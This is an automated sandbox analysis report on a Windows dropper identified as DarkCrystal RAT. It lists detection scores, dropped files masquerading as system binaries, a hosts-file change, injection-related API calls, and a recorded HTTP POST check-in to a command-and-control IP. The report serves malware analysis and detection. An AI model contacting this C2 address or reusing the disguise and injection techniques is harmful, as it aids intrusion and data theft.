                                Source: C:\Users\user\Desktop\WiKMUFpI.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\msAjSsFc.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\phOzxInG.logVirustotal: Detection: 11%Perma Link
                                Source: C:\Users\user\Desktop\vsaRQqFM.logVirustotal: Detection: 11%Perma Link
                                Source: C:\Users\user\Desktop\zQhPhksn.logVirustotal: Detection: 19%Perma Link
                                Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeReversingLabs: Detection: 87%
                                Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeVirustotal: Detection: 73%Perma Link
                                Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeReversingLabs: Detection: 87%
                                Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeVirustotal: Detection: 73%Perma Link
                                Multi AV Scanner detection for submitted file
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeReversingLabs: Detection: 60%
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeVirustotal: Detection: 69%Perma Link
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                                Source: C:\PerfDll\hyperProviderSavesinto.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\WmiPrvSE.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJoe Sandbox ML: detected
                                Source: unknownHTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D6647C
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D930F0 FindFirstFileExA,0_2_00007FF7F4D930F0
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00D5A69B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00D6C220
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98DCE0 FindFirstFileExW,7_2_000001B0BB98DCE0
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FDCE0 FindFirstFileExW,9_2_00000216D26FDCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93EDCE0 FindFirstFileExW,38_2_00000150E93EDCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9DCE0 FindFirstFileExW,40_2_00000267FCE9DCE0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52DCE0 FindFirstFileExW,45_2_000002359B52DCE0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64DCE0 FindFirstFileExW,49_2_00000225DC64DCE0
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh8_2_00007FFD9BC4D87D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh20_2_00007FFD9BC7D87D

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 176.123.168.151:80
                                Uses ping.exe to check the status of other devices and networks
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewASN Name: SPEEDYLINERU SPEEDYLINERU
                                Source: Joe Sandbox ViewJA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
                                Source: global trafficHTTP traffic detected: POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 176.123.168.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownTCP traffic detected without corresponding DNS query: 176.123.168.151
                                Source: unknownHTTP traffic detected: POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 176.123.168.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.123.168.151
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows
                                Source: hyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://176.123.168.151
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                Source: unknownHTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                                System Summary

                                barindex
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,38_2_00000150E93E253C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E202C NtQuerySystemInformation,StrCmpNIW,38_2_00000150E93E202C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E2244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,38_2_00000150E93E2244
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,46_2_00000001400010C0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,49_2_00000225DC6428C8
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D56FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00D56FAA
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\e3a74901549792Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792Jump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D756640_2_00007FF7F4D75664
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D83FCC0_2_00007FF7F4D83FCC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6A8AC0_2_00007FF7F4D6A8AC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D809980_2_00007FF7F4D80998
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7625C0_2_00007FF7F4D7625C
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6DC080_2_00007FF7F4D6DC08
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA00_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8BDB80_2_00007FF7F4D8BDB8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6BF080_2_00007FF7F4D6BF08
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D92EE40_2_00007FF7F4D92EE4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D98FC80_2_00007FF7F4D98FC8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6E8D80_2_00007FF7F4D6E8D8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8C0340_2_00007FF7F4D8C034
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7C9F00_2_00007FF7F4D7C9F0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D959A00_2_00007FF7F4D959A0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6B9440_2_00007FF7F4D6B944
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D83FCC0_2_00007FF7F4D83FCC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6B3140_2_00007FF7F4D6B314
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D672AC0_2_00007FF7F4D672AC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8FCD80_2_00007FF7F4D8FCD8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D954D00_2_00007FF7F4D954D0
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5848E1_2_00D5848E
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D540FE1_2_00D540FE
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D640881_2_00D64088
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D600B71_2_00D600B7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D751C91_2_00D751C9
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D671531_2_00D67153
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D662CA1_2_00D662CA
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D532F71_2_00D532F7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D643BF1_2_00D643BF
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D7D4401_2_00D7D440
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5F4611_2_00D5F461
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5C4261_2_00D5C426
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D677EF1_2_00D677EF
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D7D8EE1_2_00D7D8EE
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5286B1_2_00D5286B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D819F41_2_00D819F4
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5E9B71_2_00D5E9B7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D66CDC1_2_00D66CDC
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D63E0B1_2_00D63E0B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5EFE21_2_00D5EFE2
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D74F9A1_2_00D74F9A
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB951F2C7_2_000001B0BB951F2C
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB95D0E07_2_000001B0BB95D0E0
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB9638A87_2_000001B0BB9638A8
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB982B2C7_2_000001B0BB982B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98DCE07_2_000001B0BB98DCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB9944A87_2_000001B0BB9944A8
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BA90D7C8_2_00007FFD9BA90D7C
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC56BFB8_2_00007FFD9BC56BFB
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC553778_2_00007FFD9BC55377
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC462F38_2_00007FFD9BC462F3
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC554FA8_2_00007FFD9BC554FA
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC43CE98_2_00007FFD9BC43CE9
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC40CAF8_2_00007FFD9BC40CAF
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26C1F2C9_2_00000216D26C1F2C
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26D38A89_2_00000216D26D38A8
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26CD0E09_2_00000216D26CD0E0
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26F2B2C9_2_00000216D26F2B2C
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D27044A89_2_00000216D27044A8
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FDCE09_2_00000216D26FDCE0
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BAC0D7C20_2_00007FFD9BAC0D7C
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC8537720_2_00007FFD9BC85377
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC854FA20_2_00007FFD9BC854FA
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC73CE920_2_00007FFD9BC73CE9
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC70CAF20_2_00007FFD9BC70CAF
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 26_2_00007FFD9BAA0D7C26_2_00007FFD9BAA0D7C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E90538A838_2_00000150E90538A8
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E904D0E038_2_00000150E904D0E0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E9041F2C38_2_00000150E9041F2C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93F44A838_2_00000150E93F44A8
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93EDCE038_2_00000150E93EDCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E2B2C38_2_00000150E93E2B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE61F2C40_2_00000267FCE61F2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE6D0E040_2_00000267FCE6D0E0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE738A840_2_00000267FCE738A8
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE92B2C40_2_00000267FCE92B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9DCE040_2_00000267FCE9DCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCEA44A840_2_00000267FCEA44A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B4F1F2C45_2_000002359B4F1F2C
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B4FD0E045_2_000002359B4FD0E0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B5038A845_2_000002359B5038A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53AEC245_2_000002359B53AEC2
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B522B2C45_2_000002359B522B2C
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52DCE045_2_000002359B52DCE0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B5344A845_2_000002359B5344A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53A92245_2_000002359B53A922
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C46_2_000000014000226C
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400014D846_2_00000001400014D8
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000256046_2_0000000140002560
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC611F2C49_2_00000225DC611F2C
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC61D0E049_2_00000225DC61D0E0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6238A849_2_00000225DC6238A8
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC642B2C49_2_00000225DC642B2C
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64DCE049_2_00000225DC64DCE0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6544A849_2_00000225DC6544A8
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\IkSFhrpY.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6EC50 appears 56 times
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                Source: hyperProviderSavesinto.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: RuntimeBroker.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe0.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe1.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@77/37@0/1
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D63BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7F4D63BF8
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,46_2_000000014000226C
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,46_2_00000001400019C4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7C220 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7F4D7C220
